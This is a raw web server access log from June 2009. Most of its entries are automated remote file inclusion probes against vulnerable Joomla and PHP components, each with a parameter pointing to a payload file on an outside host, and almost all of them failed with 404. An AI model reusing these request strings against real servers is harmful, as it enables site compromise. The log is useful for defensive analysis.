83.13.191.186 - - [28/Jun/2009:01:40:12 -0400] "GET /logs/access_log.Q109061800/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:01:41:13 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:01:41:13 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:01:41:13 -0400] "GET /logs/access_log.Q109060200//modules/vwar/admin/admin.php?vwar_root=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:01:41:16 -0400] "GET /logs/error_log.Q109060200//modules/vwar/admin/admin.php?vwar_root=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
211.189.18.73 - - [28/Jun/2009:01:41:18 -0400] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
211.189.18.73 - - [28/Jun/2009:01:41:18 -0400] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.189.18.73 - - [28/Jun/2009:01:41:18 -0400] "GET /logs/access_log.Q109052200//modules/TotalCalendar/about.php?inc_dir=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
200.54.72.148 - - [28/Jun/2009:01:42:00 -0400] "GET /logs/access_log.Q109060400%20%20//skin/zero_vote/ask_password.php?dir=http://society.maryknoll.org/modules/MKGive/pnimages/projects/id1.txt???? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
200.54.72.148 - - [28/Jun/2009:01:42:02 -0400] "GET /logs/access_log.Q109051500%20%20//skin/zero_vote/ask_password.php?dir=http://society.maryknoll.org/modules/MKGive/pnimages/projects/id1.txt???? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
83.13.191.186 - - [28/Jun/2009:01:42:40 -0400] "GET /logs/access_log.Q109061800%20%20/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
72.30.142.179 - - [28/Jun/2009:01:42:21 -0400] "GET /logs/access_log.Q109061200 HTTP/1.0" 200 4908958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
83.13.191.186 - - [28/Jun/2009:01:42:51 -0400] "GET /logs/access_log.Q109061800%20%20/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
200.174.40.130 - - [28/Jun/2009:01:43:15 -0400] "GET /logs/error_log.Q109061000//ashnews.php?pathtoashnews=http://201.16.248.189/manual/howto/bot_site.gif? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
200.174.40.130 - - [28/Jun/2009:01:43:17 -0400] "GET //ashnews.php?pathtoashnews=http://201.16.248.189/manual/howto/bot_site.gif? HTTP/1.1" 404 210 "-" "libwww-perl/5.79"
200.174.40.130 - - [28/Jun/2009:01:43:20 -0400] "GET /logs//ashnews.php?pathtoashnews=http://201.16.248.189/manual/howto/bot_site.gif? HTTP/1.1" 404 215 "-" "libwww-perl/5.79"
200.174.40.130 - - [28/Jun/2009:01:43:59 -0400] "GET /logs/access_log.Q109061000//ashnews.php?pathtoashnews=http://201.16.248.189/manual/howto/bot_site.gif? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
209.59.12.99 - - [28/Jun/2009:01:44:12 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
83.13.191.186 - - [28/Jun/2009:01:44:40 -0400] "GET /logs/access_log.Q109052700%20%20/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
211.189.18.73 - - [28/Jun/2009:01:44:40 -0400] "GET /logs/access_log.Q109052200%20%20//modules/TotalCalendar/about.php?inc_dir=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
216.75.60.116 - - [28/Jun/2009:01:44:41 -0400] "GET /logs/access_log.Q109053000/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
216.75.60.116 - - [28/Jun/2009:01:44:41 -0400] "GET /logs/access_log.Q109051900/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
83.13.191.186 - - [28/Jun/2009:01:44:42 -0400] "GET /logs/access_log.Q109052700%20%20/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
210.115.58.73 - - [28/Jun/2009:01:44:51 -0400] "GET /logs/error_log.Q109062100/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.aptd.ru/files/id.txt?? HTTP/1.1" 404 290 "-" "libwww-perl/5.79"
210.115.58.73 - - [28/Jun/2009:01:44:51 -0400] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.aptd.ru/files/id.txt?? HTTP/1.1" 404 264 "-" "libwww-perl/5.79"
210.115.58.73 - - [28/Jun/2009:01:44:51 -0400] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.aptd.ru/files/id.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.79"
66.249.71.204 - - [28/Jun/2009:01:44:55 -0400] "GET /logs/error_log.Q107080100 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
210.115.58.73 - - [28/Jun/2009:01:45:03 -0400] "GET /logs/access_log.Q109062500/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.aptd.ru/files/id.txt?? HTTP/1.1" 404 291 "-" "libwww-perl/5.79"
211.189.18.73 - - [28/Jun/2009:01:45:22 -0400] "GET /logs/access_log.Q109062500%20%20//modules/TotalCalendar/about.php?inc_dir=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:01:46:13 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:01:46:13 -0400] "GET /logs/access_log.Q109060200%20%20//modules/vwar/admin/admin.php?vwar_root=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:01:46:13 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:01:46:14 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:01:46:14 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:01:46:15 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:01:46:15 -0400] "GET /logs/access_log.Q109060200%20%20//modules/vwar/admin/admin.php?vwar_root=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:01:46:15 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:01:46:15 -0400] "GET /logs/access_log.Q109060200%20%20//modules/vwar/admin/admin.php?vwar_root=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
210.115.58.73 - - [28/Jun/2009:01:46:19 -0400] "GET /logs/error_log.Q109051300%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.aptd.ru/files/id.txt?? HTTP/1.1" 404 291 "-" "libwww-perl/5.79"
195.34.78.110 - - [28/Jun/2009:01:46:19 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
210.115.58.73 - - [28/Jun/2009:01:46:19 -0400] "GET /logs/access_log.Q109061400%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.aptd.ru/files/id.txt?? HTTP/1.1" 404 292 "-" "libwww-perl/5.79"
195.34.78.110 - - [28/Jun/2009:01:46:19 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:01:46:21 -0400] "GET /logs/access_log.Q109060200%20%20//modules/vwar/admin/admin.php?vwar_root=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:01:46:25 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:01:46:25 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:01:46:25 -0400] "GET /logs/access_log.Q109060200%20%20//modules/vwar/admin/admin.php?vwar_root=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
200.54.72.148 - - [28/Jun/2009:01:46:28 -0400] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://society.maryknoll.org/modules/MKGive/pnimages/projects/id1.txt???? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
200.54.72.148 - - [28/Jun/2009:01:46:29 -0400] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://society.maryknoll.org/modules/MKGive/pnimages/projects/id1.txt???? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
200.54.72.148 - - [28/Jun/2009:01:46:29 -0400] "GET /logs/access_log.Q109062500/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://society.maryknoll.org/modules/MKGive/pnimages/projects/id1.txt???? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:01:46:33 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:01:46:33 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:01:46:33 -0400] "GET /logs/access_log.Q109060200%20%20//modules/vwar/admin/admin.php?vwar_root=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:01:46:59 -0400] "GET /logs/error_log.Q109060200%20%20//modules/vwar/admin/admin.php?vwar_root=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:01:47:01 -0400] "GET /logs/access_log.Q109060200%20%20//modules/vwar/admin/admin.php?vwar_root=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:01:47:01 -0400] "GET /logs/error_log.Q109060200%20%20//modules/vwar/admin/admin.php?vwar_root=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:01:47:02 -0400] "GET /logs/error_log.Q109060200%20%20//modules/vwar/admin/admin.php?vwar_root=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:01:47:02 -0400] "GET /logs/error_log.Q109060200%20%20//modules/vwar/admin/admin.php?vwar_root=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:01:47:11 -0400] "GET /logs/error_log.Q109060200%20%20//modules/vwar/admin/admin.php?vwar_root=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:01:47:18 -0400] "GET /logs/error_log.Q109060200%20%20//modules/vwar/admin/admin.php?vwar_root=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:01:47:42 -0400] "GET /logs/error_log.Q109060200%20%20//modules/vwar/admin/admin.php?vwar_root=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
83.98.209.71 - - [28/Jun/2009:01:47:53 -0400] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
83.98.209.71 - - [28/Jun/2009:01:47:53 -0400] "GET /logs/access_log.Q109060300/components/com_performs/performs.php?mosConfig_absolute_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
83.98.209.71 - - [28/Jun/2009:01:47:53 -0400] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
83.98.209.71 - - [28/Jun/2009:01:47:57 -0400] "GET /logs/access_log.Q109050900/components/com_performs/performs.php?mosConfig_absolute_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
83.98.209.71 - - [28/Jun/2009:01:47:58 -0400] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
83.98.209.71 - - [28/Jun/2009:01:47:58 -0400] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
83.98.209.71 - - [28/Jun/2009:01:47:58 -0400] "GET /logs/access_log.Q109060300/components/com_performs/performs.php?mosConfig_absolute_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
83.98.209.71 - - [28/Jun/2009:01:48:01 -0400] "GET /logs/access_log.Q109050900/components/com_performs/performs.php?mosConfig_absolute_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
211.189.18.73 - - [28/Jun/2009:01:48:15 -0400] "GET /logs/access_log.Q109062500//modules/TotalCalendar/about.php?inc_dir=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:01:48:56 -0400] "GET /logs/access_log.Q109050900%20%20//modules/vwar/admin/admin.php?vwar_root=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:01:48:57 -0400] "GET /logs/access_log.Q109050900%20%20//modules/vwar/admin/admin.php?vwar_root=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:01:48:57 -0400] "GET /logs/access_log.Q109050900%20%20//modules/vwar/admin/admin.php?vwar_root=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:01:48:58 -0400] "GET /logs/access_log.Q109050900%20%20//modules/vwar/admin/admin.php?vwar_root=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:01:49:00 -0400] "GET /logs/error_log.Q109050900%20%20//modules/vwar/admin/admin.php?vwar_root=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:01:49:01 -0400] "GET /logs/error_log.Q109050900%20%20//modules/vwar/admin/admin.php?vwar_root=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:01:49:01 -0400] "GET /logs/error_log.Q109050900%20%20//modules/vwar/admin/admin.php?vwar_root=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:01:49:02 -0400] "GET /logs/error_log.Q109050900%20%20//modules/vwar/admin/admin.php?vwar_root=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:01:49:06 -0400] "GET /logs/access_log.Q109050900%20%20//modules/vwar/admin/admin.php?vwar_root=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:01:49:10 -0400] "GET /logs/error_log.Q109050900%20%20//modules/vwar/admin/admin.php?vwar_root=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jun/2009:01:49:11 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
195.34.78.110 - - [28/Jun/2009:01:49:13 -0400] "GET /logs/access_log.Q109050900%20%20//modules/vwar/admin/admin.php?vwar_root=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:01:49:16 -0400] "GET /logs/error_log.Q109050900%20%20//modules/vwar/admin/admin.php?vwar_root=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:01:49:35 -0400] "GET /logs/access_log.Q109050900%20%20//modules/vwar/admin/admin.php?vwar_root=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:01:49:38 -0400] "GET /logs/error_log.Q109050900%20%20//modules/vwar/admin/admin.php?vwar_root=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
72.30.142.179 - - [28/Jun/2009:01:49:41 -0400] "GET /logs/access_log.Q109061900 HTTP/1.0" 200 3745986 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
60.50.4.184 - - [28/Jun/2009:01:50:03 -0400] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.katrinkurven.dk//plugins/search/id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
60.50.4.184 - - [28/Jun/2009:01:50:03 -0400] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.katrinkurven.dk//plugins/search/id1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
60.50.4.184 - - [28/Jun/2009:01:50:03 -0400] "GET /logs/access_log.Q109052400%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.katrinkurven.dk//plugins/search/id1.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:01:50:29 -0400] "GET /logs/access_log.Q109060200//modules/vwar/admin/admin.php?vwar_root=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
83.98.209.71 - - [28/Jun/2009:01:50:32 -0400] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://aboutav.com//id2.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
83.98.209.71 - - [28/Jun/2009:01:50:32 -0400] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://aboutav.com//id2.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
83.98.209.71 - - [28/Jun/2009:01:50:32 -0400] "GET /logs/access_log.Q109060300/components/com_performs/performs.php?mosConfig_absolute_path=http://aboutav.com//id2.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
195.34.78.110 - - [28/Jun/2009:01:50:33 -0400] "GET /logs/error_log.Q109060200//modules/vwar/admin/admin.php?vwar_root=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:01:50:35 -0400] "GET /logs/access_log.Q109060200//modules/vwar/admin/admin.php?vwar_root=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:01:50:37 -0400] "GET /logs/access_log.Q109060200//modules/vwar/admin/admin.php?vwar_root=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
200.54.72.148 - - [28/Jun/2009:01:50:37 -0400] "GET /logs/access_log.Q109062500%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://society.maryknoll.org/modules/MKGive/pnimages/projects/id1.txt???? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
83.98.209.71 - - [28/Jun/2009:01:50:37 -0400] "GET /logs/access_log.Q109050900/components/com_performs/performs.php?mosConfig_absolute_path=http://aboutav.com//id2.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
195.34.78.110 - - [28/Jun/2009:01:50:39 -0400] "GET /logs/error_log.Q109060200//modules/vwar/admin/admin.php?vwar_root=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:01:50:40 -0400] "GET /logs/error_log.Q109060200//modules/vwar/admin/admin.php?vwar_root=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
66.249.71.16 - - [28/Jun/2009:01:50:43 -0400] "GET /images/items/682402_full.jpg HTTP/1.1" 200 8351 "-" "Googlebot-Image/1.0"
82.194.62.200 - - [28/Jun/2009:01:50:45 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
82.194.62.200 - - [28/Jun/2009:01:50:45 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
82.194.62.200 - - [28/Jun/2009:01:50:47 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
82.194.62.200 - - [28/Jun/2009:01:50:47 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
195.34.78.110 - - [28/Jun/2009:01:50:52 -0400] "GET /logs/access_log.Q109060200//modules/vwar/admin/admin.php?vwar_root=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:01:50:58 -0400] "GET /logs/error_log.Q109060200//modules/vwar/admin/admin.php?vwar_root=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
83.98.209.71 - - [28/Jun/2009:01:51:08 -0400] "GET /logs/access_log.Q109061300%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
83.98.209.71 - - [28/Jun/2009:01:51:08 -0400] "GET /logs/access_log.Q109061300%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
201.232.54.48 - - [28/Jun/2009:01:53:00 -0400] "GET /logs/index.php?option=com_restaurante&task=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
201.232.54.48 - - [28/Jun/2009:01:53:00 -0400] "GET /logs/access_log.Q109053100/index.php?option=com_restaurante&task=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
201.232.54.48 - - [28/Jun/2009:01:53:00 -0400] "GET /index.php?option=com_restaurante&task=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
201.232.54.48 - - [28/Jun/2009:01:53:00 -0400] "GET /logs/access_log.Q109061400/index.php?option=com_restaurante&task=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
131.203.76.246 - - [28/Jun/2009:01:53:11 -0400] "GET /index.php?option=com_restaurante&task=http://www.usher.co.kr//flvPlay/fx29id.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
131.203.76.246 - - [28/Jun/2009:01:53:11 -0400] "GET /logs/index.php?option=com_restaurante&task=http://www.usher.co.kr//flvPlay/fx29id.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
131.203.76.246 - - [28/Jun/2009:01:53:11 -0400] "GET /logs/access_log.Q109053100%20%20/index.php?option=com_restaurante&task=http://www.usher.co.kr//flvPlay/fx29id.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
210.115.58.73 - - [28/Jun/2009:01:53:20 -0400] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.aptd.ru/files/id.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
210.115.58.73 - - [28/Jun/2009:01:53:20 -0400] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.aptd.ru/files/id.txt?? HTTP/1.1" 404 239 "-" "libwww-perl/5.79"
210.115.58.73 - - [28/Jun/2009:01:53:20 -0400] "GET /logs/access_log.Q109060300/components/com_performs/performs.php?mosConfig_absolute_path=http://www.aptd.ru/files/id.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.79"
131.203.76.246 - - [28/Jun/2009:01:53:22 -0400] "GET /logs/access_log.Q109061400%20%20/index.php?option=com_restaurante&task=http://www.usher.co.kr//flvPlay/fx29id.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
83.98.209.71 - - [28/Jun/2009:01:53:28 -0400] "GET /logs/access_log.Q109051000/components/com_performs/performs.php?mosConfig_absolute_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
83.13.191.186 - - [28/Jun/2009:01:53:46 -0400] "GET /logs/access_log.Q109052700/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
83.13.191.186 - - [28/Jun/2009:01:53:51 -0400] "GET /logs/access_log.Q109052700/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
83.98.209.71 - - [28/Jun/2009:01:53:52 -0400] "GET /logs/access_log.Q109061300/components/com_performs/performs.php?mosConfig_absolute_path=http://aboutav.com//id2.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
83.98.209.71 - - [28/Jun/2009:01:53:58 -0400] "GET /logs/error_log.Q109060100/components/com_performs/performs.php?mosConfig_absolute_path=http://aboutav.com//id2.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
83.98.209.71 - - [28/Jun/2009:01:54:10 -0400] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://aboutav.com//id2.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
